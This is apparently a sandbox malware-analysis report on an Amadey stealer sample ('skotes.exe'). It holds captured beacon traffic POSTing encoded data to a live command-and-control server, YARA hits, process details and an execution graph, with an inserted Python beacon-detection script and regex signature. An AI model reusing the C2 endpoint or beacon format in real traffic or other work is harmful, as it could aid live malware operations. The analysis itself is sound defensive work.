                                              Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 35 32 38 37 37 42 30 35 46 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
                                              Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB52877B05F82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
                                              Nov 22, 2024 17:14:12.653995991 CET | 196 | IN | HTTP/1.1 200 OK
                                              Server: nginx/1.18.0 (Ubuntu)
                                              Date: Fri, 22 Nov 2024 16:14:12 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: keep-alive
                                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                              Data Ascii: 7 <c><d>0


                                               Session ID: 22 | Source IP: 192.168.2.8 | Source Port: 49731 | Destination IP: 185.215.113.43 | Destination Port: 80 | PID: 8076 | Process: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                               Timestamp | Bytes transferred | Direction | Data
                                               Nov 22, 2024 17:14:14.401375055 CET | 156 | OUT | POST /Zu7JuNko/index.php HTTP/1.1
                                              Content-Type: application/x-www-form-urlencoded
                                              Host: 185.215.113.43
                                              Content-Length: 4
                                              Cache-Control: no-cache
                                              Data Raw: 73 74 3d 73
                                              Data Ascii: st=s
                                               Nov 22, 2024 17:14:15.779257059 CET | 219 | IN | HTTP/1.1 200 OK
                                              Server: nginx/1.18.0 (Ubuntu)
                                              Date: Fri, 22 Nov 2024 16:14:15 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: keep-alive
                                              Refresh: 0; url = Login.php
                                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                              Data Ascii: 1 0


                                               Session ID: 23 | Source IP: 192.168.2.8 | Source Port: 49732 | Destination IP: 185.215.113.43 | Destination Port: 80 | PID: 8076 | Process: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                               Timestamp | Bytes transferred | Direction | Data
                                               Nov 22, 2024 17:14:17.417208910 CET | 310 | OUT | POST /Zu7JuNko/index.php HTTP/1.1
                                              Content-Type: application/x-www-form-urlencoded
                                              Host: 185.215.113.43
                                              Content-Length: 156
                                              Cache-Control: no-cache
                                              Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 35 32 38 37 37 42 30 35 46 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
                                              Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB52877B05F82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
                                               Nov 22, 2024 17:14:18.766311884 CET | 196 | IN | HTTP/1.1 200 OK
                                              Server: nginx/1.18.0 (Ubuntu)
                                              Date: Fri, 22 Nov 2024 16:14:18 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: keep-alive
                                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                              Data Ascii: 7 <c><d>0


                                               Session ID: 24 | Source IP: 192.168.2.8 | Source Port: 49733 | Destination IP: 185.215.113.43 | Destination Port: 80 | PID: 8076 | Process: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                               Timestamp | Bytes transferred | Direction | Data
                                               Nov 22, 2024 17:14:20.650302887 CET | 156 | OUT | POST /Zu7JuNko/index.php HTTP/1.1
                                              Content-Type: application/x-www-form-urlencoded
                                              Host: 185.215.113.43
                                              Content-Length: 4
                                              Cache-Control: no-cache
                                              Data Raw: 73 74 3d 73
                                              Data Ascii: st=s
                                               Nov 22, 2024 17:14:22.023087025 CET | 219 | IN | HTTP/1.1 200 OK
                                              Server: nginx/1.18.0 (Ubuntu)
                                              Date: Fri, 22 Nov 2024 16:14:21 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: keep-alive
                                              Refresh: 0; url = Login.php
                                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                              Data Ascii: 1 0


                                               Session ID: 25 | Source IP: 192.168.2.8 | Source Port: 49734 | Destination IP: 185.215.113.43 | Destination Port: 80 | PID: 8076 | Process: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                               Timestamp | Bytes transferred | Direction | Data
                                               Nov 22, 2024 17:14:23.714600086 CET | 310 | OUT | POST /Zu7JuNko/index.php HTTP/1.1
                                              Content-Type: application/x-www-form-urlencoded
                                              Host: 185.215.113.43
                                              Content-Length: 156
                                              Cache-Control: no-cache
                                              Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 35 32 38 37 37 42 30 35 46 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
                                              Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB52877B05F82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
                                               Nov 22, 2024 17:14:25.114605904 CET | 196 | IN | HTTP/1.1 200 OK
                                              Server: nginx/1.18.0 (Ubuntu)
                                              Date: Fri, 22 Nov 2024 16:14:24 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: keep-alive
                                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                              Data Ascii: 7 <c><d>0


                                               Session ID: 26 | Source IP: 192.168.2.8 | Source Port: 49735 | Destination IP: 185.215.113.43 | Destination Port: 80 | PID: 8076 | Process: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                               Timestamp | Bytes transferred | Direction | Data
                                               Nov 22, 2024 17:14:26.877865076 CET | 156 | OUT | POST /Zu7JuNko/index.php HTTP/1.1
                                              Content-Type: application/x-www-form-urlencoded
                                              Host: 185.215.113.43
                                              Content-Length: 4
                                              Cache-Control: no-cache
                                              Data Raw: 73 74 3d 73
                                              Data Ascii: st=s
                                               Nov 22, 2024 17:14:28.272814035 CET | 219 | IN | HTTP/1.1 200 OK
                                              Server: nginx/1.18.0 (Ubuntu)
                                              Date: Fri, 22 Nov 2024 16:14:28 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: keep-alive
                                              Refresh: 0; url = Login.php
                                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                              Data Ascii: 1 0


                                               Session ID: 27 | Source IP: 192.168.2.8 | Source Port: 49736 | Destination IP: 185.215.113.43 | Destination Port: 80 | PID: 8076 | Process: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                               Timestamp | Bytes transferred | Direction | Data
                                               Nov 22, 2024 17:14:29.901704073 CET | 310 | OUT | POST /Zu7JuNko/index.php HTTP/1.1
                                              Content-Type: application/x-www-form-urlencoded
                                              Host: 185.215.113.43
                                              Content-Length: 156
                                              Cache-Control: no-cache
                                              Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 35 32 38 37 37 42 30 35 46 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
                                              Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB52877B05F82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
                                               Nov 22, 2024 17:14:31.302551985 CET | 196 | IN | HTTP/1.1 200 OK
                                              Server: nginx/1.18.0 (Ubuntu)
                                              Date: Fri, 22 Nov 2024 16:14:31 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: keep-alive
                                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                              Data Ascii: 7 <c><d>0


                                               Session ID: 28 | Source IP: 192.168.2.8 | Source Port: 49737 | Destination IP: 185.215.113.43 | Destination Port: 80 | PID: 8076 | Process: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                               Timestamp | Bytes transferred | Direction | Data
                                               Nov 22, 2024 17:14:33.060070038 CET | 156 | OUT | POST /Zu7JuNko/index.php HTTP/1.1
                                              Content-Type: application/x-www-form-urlencoded
                                              Host: 185.215.113.43
                                              Content-Length: 4
                                              Cache-Control: no-cache
                                              Data Raw: 73 74 3d 73
                                              Data Ascii: st=s
                                               Nov 22, 2024 17:14:34.413427114 CET | 219 | IN | HTTP/1.1 200 OK
                                              Server: nginx/1.18.0 (Ubuntu)
                                              Date: Fri, 22 Nov 2024 16:14:34 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: keep-alive
                                              Refresh: 0; url = Login.php
                                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                              Data Ascii: 1 0


                                               Session ID: 29 | Source IP: 192.168.2.8 | Source Port: 49738 | Destination IP: 185.215.113.43 | Destination Port: 80 | PID: 8076 | Process: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                               Timestamp | Bytes transferred | Direction | Data
                                               Nov 22, 2024 17:14:36.042746067 CET | 310 | OUT | POST /Zu7JuNko/index.php HTTP/1.1
                                              Content-Type: application/x-www-form-urlencoded
                                              Host: 185.215.113.43
                                              Content-Length: 156
                                              Cache-Control: no-cache
                                              Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 35 32 38 37 37 42 30 35 46 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
                                              Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB52877B05F82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
                                               Nov 22, 2024 17:14:37.387913942 CET | 196 | IN | HTTP/1.1 200 OK
                                              Server: nginx/1.18.0 (Ubuntu)
                                              Date: Fri, 22 Nov 2024 16:14:37 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: keep-alive
                                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                              Data Ascii: 7 <c><d>0


                                               Session ID: 30 | Source IP: 192.168.2.8 | Source Port: 49739 | Destination IP: 185.215.113.43 | Destination Port: 80 | PID: 8076 | Process: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                               Timestamp | Bytes transferred | Direction | Data
                                               Nov 22, 2024 17:14:39.134449005 CET | 156 | OUT | POST /Zu7JuNko/index.php HTTP/1.1
                                              Content-Type: application/x-www-form-urlencoded
                                              Host: 185.215.113.43
                                              Content-Length: 4
                                              Cache-Control: no-cache
                                              Data Raw: 73 74 3d 73
                                              Data Ascii: st=s
                                               Nov 22, 2024 17:14:40.515144110 CET | 219 | IN | HTTP/1.1 200 OK
                                              Server: nginx/1.18.0 (Ubuntu)
                                              Date: Fri, 22 Nov 2024 16:14:40 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: keep-alive
                                              Refresh: 0; url = Login.php
                                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                              Data Ascii: 1 0


                                               Session ID: 31 | Source IP: 192.168.2.8 | Source Port: 49740 | Destination IP: 185.215.113.43 | Destination Port: 80 | PID: 8076 | Process: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                               Timestamp | Bytes transferred | Direction | Data
                                               Nov 22, 2024 17:14:42.151180029 CET | 310 | OUT | POST /Zu7JuNko/index.php HTTP/1.1
                                              Content-Type: application/x-www-form-urlencoded
                                              Host: 185.215.113.43
                                              Content-Length: 156
                                              Cache-Control: no-cache
                                              Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 35 32 38 37 37 42 30 35 46 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
                                              Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB52877B05F82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
                                               Nov 22, 2024 17:14:43.533092022 CET | 196 | IN | HTTP/1.1 200 OK
                                              Server: nginx/1.18.0 (Ubuntu)
                                              Date: Fri, 22 Nov 2024 16:14:43 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: keep-alive
                                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                              Data Ascii: 7 <c><d>0


                                               Session ID: 32 | Source IP: 192.168.2.8 | Source Port: 49741 | Destination IP: 185.215.113.43 | Destination Port: 80 | PID: 8076 | Process: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                               Timestamp | Bytes transferred | Direction | Data
                                               Nov 22, 2024 17:14:45.277729988 CET | 156 | OUT | POST /Zu7JuNko/index.php HTTP/1.1
                                              Content-Type: application/x-www-form-urlencoded
                                              Host: 185.215.113.43
                                              Content-Length: 4
                                              Cache-Control: no-cache
                                              Data Raw: 73 74 3d 73
                                              Data Ascii: st=s
                                               Nov 22, 2024 17:14:46.657111883 CET | 219 | IN | HTTP/1.1 200 OK
                                              Server: nginx/1.18.0 (Ubuntu)
                                              Date: Fri, 22 Nov 2024 16:14:46 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: keep-alive
                                              Refresh: 0; url = Login.php
                                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                              Data Ascii: 1 0
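The sessions above are one beacon loop: skotes.exe POSTs, in strict alternation, a 156-byte `r=<hex>` body and a 4-byte `st=s` body to /Zu7JuNko/index.php on 185.215.113.43 about every three seconds; the server answers the first with a chunked ` <c><d>` and the second with a single space plus a `Refresh: 0; url = Login.php` header. The script below is an added example, not code from the Joe Sandbox report or from Amadey. It decodes the chunked response bodies, labels each request by the shape of its form body and measures the inter-request cadence, which is how a detection engineer turns this capture into a beacon verdict. SESSIONS is constructed from the twelve request timestamps, bodies and raw response bytes shown above; the request labels ("report", "status") and the jitter threshold in `triage()` are this example's assumptions, not Amadey's documented protocol.

```python
"""Beacon triage of the skotes.exe -> 185.215.113.43 sessions shown above.

Added example, not code from the Joe Sandbox report or from Amadey. SESSIONS is
constructed from the twelve request/response pairs above; the labels returned by
label_request() and the max_cv threshold in triage() are this example's assumptions.
"""
import re
import statistics
from datetime import datetime
from urllib.parse import parse_qs

# 154 hex characters; with the leading "r=" this is the Content-Length: 156 body.
R_HEX = ("B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DD"
         "F642E3BDD70A7DB52877B05F82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9")
# Raw response bodies exactly as the "Data Raw" lines show them: chunked, one chunk each.
RESP_TO_R = bytes.fromhex("370d0a203c633e3c643e0d0a300d0a0d0a")   # 7\r\n <c><d>\r\n0\r\n\r\n
RESP_TO_ST = bytes.fromhex("310d0a200d0a300d0a0d0a")              # 1\r\n \r\n0\r\n\r\n

# Constructed from sessions 21-32: (request time, POST body, raw chunked response body)
SESSIONS = [
    ("17:14:11.208610", "r=" + R_HEX, RESP_TO_R),
    ("17:14:14.401375", "st=s", RESP_TO_ST),
    ("17:14:17.417208", "r=" + R_HEX, RESP_TO_R),
    ("17:14:20.650302", "st=s", RESP_TO_ST),
    ("17:14:23.714600", "r=" + R_HEX, RESP_TO_R),
    ("17:14:26.877865", "st=s", RESP_TO_ST),
    ("17:14:29.901704", "r=" + R_HEX, RESP_TO_R),
    ("17:14:33.060070", "st=s", RESP_TO_ST),
    ("17:14:36.042746", "r=" + R_HEX, RESP_TO_R),
    ("17:14:39.134449", "st=s", RESP_TO_ST),
    ("17:14:42.151180", "r=" + R_HEX, RESP_TO_R),
    ("17:14:45.277729", "st=s", RESP_TO_ST),
]


def decode_chunked(raw):
    """Decode an HTTP/1.1 chunked body (RFC 9112 section 7.1); trailers are ignored."""
    out, pos = bytearray(), 0
    while True:
        eol = raw.index(b"\r\n", pos)
        size = int(raw[pos:eol].split(b";")[0], 16)   # drop any chunk extension
        pos = eol + 2
        if size == 0:                                   # last-chunk
            return bytes(out)
        out += raw[pos:pos + size]
        pos += size + 2                                 # skip chunk data and its CRLF


def label_request(body):
    """Label a check-in by the shape of its form body (the labels are this example's names)."""
    fields = parse_qs(body, keep_blank_values=True)
    if set(fields) == {"r"} and re.fullmatch(r"(?:[0-9A-F]{2})+", fields["r"][0]):
        return "report"            # one long, even-length, upper-case hex blob
    if set(fields) == {"st"} and fields["st"] == ["s"]:
        return "status"
    return "other"


def cadence(times):
    """Mean gap, population stdev and coefficient of variation of consecutive request times."""
    stamps = [datetime.strptime(t, "%H:%M:%S.%f") for t in times]
    gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
    mean, sd = statistics.mean(gaps), statistics.pstdev(gaps)
    return mean, sd, sd / mean


def triage(sessions, max_cv=0.25):
    """Verdict: alternating report/status POSTs at a steady period with low jitter is a beacon."""
    labels = [label_request(body) for _, body, _ in sessions]
    replies = sorted({decode_chunked(raw).strip() for _, _, raw in sessions})
    mean, sd, cv = cadence([t for t, _, _ in sessions])
    alternating = all(a != b for a, b in zip(labels, labels[1:]))
    return {
        "labels": labels,
        "replies": replies,
        "mean_gap_s": round(mean, 3),
        "jitter_s": round(sd, 3),
        "cv": round(cv, 3),
        "beacon": cv < max_cv and alternating and set(labels) == {"report", "status"},
    }


if __name__ == "__main__":
    print(triage(SESSIONS))
```

On this capture the mean gap is about 3.1 s with under 3% jitter, far too regular for a human-driven browser. The body and header shape is also narrow enough for a network rule: the captured requests carry only Content-Type, Host, Content-Length and Cache-Control headers, always POST to index.php, and the body matches `^(r=[0-9A-F]{154}|st=s)$`; pair that with the `<c><d>` reply and the `Refresh: 0; url = Login.php` header and the false-positive rate on real web traffic is negligible.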


                                               Target ID: 0
                                               Start time: 11:12:40
                                               Start date: 22/11/2024
                                               Path: C:\Users\user\Desktop\file.exe
                                               Wow64 process (32bit): true
                                               Commandline: "C:\Users\user\Desktop\file.exe"
                                               Imagebase: 0x4f0000
                                               File size: 1'922'048 bytes
                                               MD5 hash: 9DDBAC8AABA1C5BB2F9A22717A60A6BA
                                               Has elevated privileges: true
                                               Has administrator privileges: true
                                               Programmed in: C, C++ or other language
                                               Yara matches:
                                               • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000000.00000003.1423354567.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                               • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000000.00000002.1463607272.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                               Reputation: low
                                               Has exited: true

                                               Target ID: 2
                                               Start time: 11:12:44
                                               Start date: 22/11/2024
                                               Path: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                               Wow64 process (32bit): true
                                               Commandline: "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
                                               Imagebase: 0x720000
                                               File size: 1'922'048 bytes
                                               MD5 hash: 9DDBAC8AABA1C5BB2F9A22717A60A6BA
                                               Has elevated privileges: true
                                               Has administrator privileges: true
                                               Programmed in: C, C++ or other language
                                               Yara matches:
                                               • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000002.00000002.1497759494.0000000000721000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                               • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000002.00000003.1457117559.00000000049A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                               Antivirus matches:
                                               • Detection: 100%, Avira
                                               • Detection: 100%, Joe Sandbox ML
                                               • Detection: 50%, ReversingLabs
                                               Reputation: low
                                               Has exited: true

                                               Target ID: 3
                                               Start time: 11:12:46
                                               Start date: 22/11/2024
                                               Path: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                               Wow64 process (32bit): true
                                               Commandline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                               Imagebase: 0x720000
                                               File size: 1'922'048 bytes
                                               MD5 hash: 9DDBAC8AABA1C5BB2F9A22717A60A6BA
                                               Has elevated privileges: true
                                               Has administrator privileges: true
                                               Programmed in: C, C++ or other language
                                               Yara matches:
                                               • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000003.00000003.1466497850.0000000004F20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                               • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000003.00000002.1507039683.0000000000721000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                               Reputation: low
                                               Has exited: true

                                               Target ID: 5
                                               Start time: 11:13:00
                                               Start date: 22/11/2024
                                               Path: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                               Wow64 process (32bit): true
                                               Commandline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                               Imagebase: 0x720000
                                               File size: 1'922'048 bytes
                                               MD5 hash: 9DDBAC8AABA1C5BB2F9A22717A60A6BA
                                               Has elevated privileges: true
                                               Has administrator privileges: true
                                               Programmed in: C, C++ or other language
                                               Yara matches:
                                               • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000005.00000002.2654348620.0000000000721000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                               • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000005.00000003.1611788887.0000000004970000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                               Reputation: low
                                               Has exited: false

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1467474246.0000000004F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4f10000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fc678b4c1a0fb215d7b5578b13efd8e465420a3fddd258cdaa81e6693fe31f32
                                                • Instruction ID: c88550726a3427b76281d8d351438a467de5ed9fb3f60c7cb8c136b1edf74473
                                                • Opcode Fuzzy Hash: fc678b4c1a0fb215d7b5578b13efd8e465420a3fddd258cdaa81e6693fe31f32
                                                • Instruction Fuzzy Hash: CA0175EB2891207C714191923F28EFBA76DE1D2770331C82BF403D0846E6891A9E2032
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1467474246.0000000004F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4f10000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0600fa2028a0c0cd6ad6221492478d3e1578843049e268e75e50df91dcac9605
                                                • Instruction ID: 433864ce851fb931030d9e8732e3fe4cfa68580e3213bb0fe320fce1f35bd468
                                                • Opcode Fuzzy Hash: 0600fa2028a0c0cd6ad6221492478d3e1578843049e268e75e50df91dcac9605
                                                • Instruction Fuzzy Hash: 6611BCEB60D0507CB20281923F58EFB6B2DE5C3730331886BF403C9412E6890E8F6232
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1467474246.0000000004F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4f10000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e14adc5d22b5f7c7d1f450bf9d9c36c44c17052869fda3846bf9916d56e6f767
                                                • Instruction ID: 532ff07647650cade2e3d627877a17e9d81e0996dd760b2adfb1098b3764e52a
                                                • Opcode Fuzzy Hash: e14adc5d22b5f7c7d1f450bf9d9c36c44c17052869fda3846bf9916d56e6f767
                                                • Instruction Fuzzy Hash: F9F054FB24E0647C7051D1923F28EFB976DE1C2B71331C82BF802D0846E6890E9E6132

                                                Execution Graph

                                                 Execution Coverage: 6.7%
                                                 Dynamic/Decrypted Code Coverage: 0%
                                                 Signature Coverage: 12%
                                                 Total number of Nodes: 325
                                                 Total number of Limit Nodes: 6
                                                 execution_graph (node id, address, label -> successors)
                                                 11939 727430 -> 11940
                                                 11940 727465 shared_ptr -> 11944, 11945
                                                 11944 72755f shared_ptr
                                                 11945 73d111 -> 11948
                                                 11942 7275ed -> 11944, 11949
                                                 11949 73d0c7 -> 11950
                                                 11948 73d122 -> 11947, 11953
                                                 11947 73d12a -> 11942
                                                 11953 73d199 -> 11954, 11956
                                                 11950 73d0d7 -> 11951, 11952
                                                 11951 73d17f -> 11944
                                                 11952 73d17b RtlWakeAllConditionVariable -> 11944
                                                 11954 73d1a7 SleepConditionVariableCS -> 11956
                                                 11956 73d1c0 -> 11948

                                                 12116 72e0c0 recv -> 12117
                                                 12117 72e122 recv -> 12118
                                                 12118 72e157 recv -> 12120
                                                 12120 72e191 -> 12119, 12121
                                                 12119 72e2b3
                                                 12121 73c6ac GetSystemTimePreciseAsFileTime -> 12122
                                                 12122 72e2ee -> 12123
                                                 12123 73c26a 3 API calls -> 12124
                                                 12124 72e358

                                                 11829 731ec0 -> 11832
                                                 11832 731f5b shared_ptr __dosmaperr -> 11831, 11833, 11834
                                                 11830 72e530 6 API calls -> 11831
                                                 11831 732a26 shared_ptr std::_Xinvalid_argument
                                                 11833 731f68 -> 11830
                                                 11834 7328c1 -> 11838
                                                 11838 72e530 -> 11839
                                                 11836 732933 -> 11831, 11854
                                                 11854 725ee0 -> 11855
                                                 11839 72e576 -> 11861
                                                 11861 72be30 -> 11862, 11865
                                                 11841 72ea8f shared_ptr -> 11836
                                                 11842 72e7fe -> 11841, 11843
                                                 11843 72e530 6 API calls -> 11845
                                                 11845 72f786 -> 11844, 11846
                                                 11844 72f982 shared_ptr -> 11836
                                                 11846 72e530 6 API calls -> 11848
                                                 11848 72fa63 -> 11847, 11849
                                                 11847 72fb35 shared_ptr -> 11836
                                                 11849 72e530 6 API calls -> 11851
                                                 11851 73063c -> 11850, 11852
                                                 11850 730880 shared_ptr -> 11836
                                                 11852 72e530 6 API calls -> 11853
                                                 11853 7312e9
                                                 11855 725f18 -> 11856, 11857
                                                 11856 725ffe shared_ptr -> 11831
                                                 11857 726150 RegOpenKeyExA -> 11859, 11860
                                                 11859 726493 shared_ptr -> 11831
                                                 11860 7261a3 __cftof -> 11858, 11859
